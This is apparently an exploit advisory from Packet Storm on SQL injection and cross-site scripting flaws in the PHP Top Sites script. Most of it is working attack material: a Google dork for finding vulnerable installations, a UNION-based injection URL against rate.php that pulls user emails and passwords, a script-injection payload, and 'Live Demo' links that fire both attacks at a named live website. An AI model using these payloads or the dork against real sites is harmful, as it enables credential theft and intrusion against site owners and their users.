PHP Top Sites suffers from cross site scripting and remote SQL injection vulnerabilities.
c8192bcf03e28e2a7361ecccc26e001882bc9dc6962685702841213293c057d1
<------------------- header data start ------------------- >
#############################################################
PHP Top Sites Multiple SQL/XSS Vulnerability
#############################################################
# Author : kAsvææ | c0de Hunters
# Name : PHP Top Sites
# Bug Type : SQL/XSS
# Version :All
# Google Dork:"Powered By PHP TopSites"
# Home Page : http://itop10.net/
# You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
SQL : "rate.php" (String SQL Injection)
[EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
XSS : "rate.php"
[EXPLOIT] : rate.php?site="'><script>alert('xss')</script>
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
< -- bug code end of -- >
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed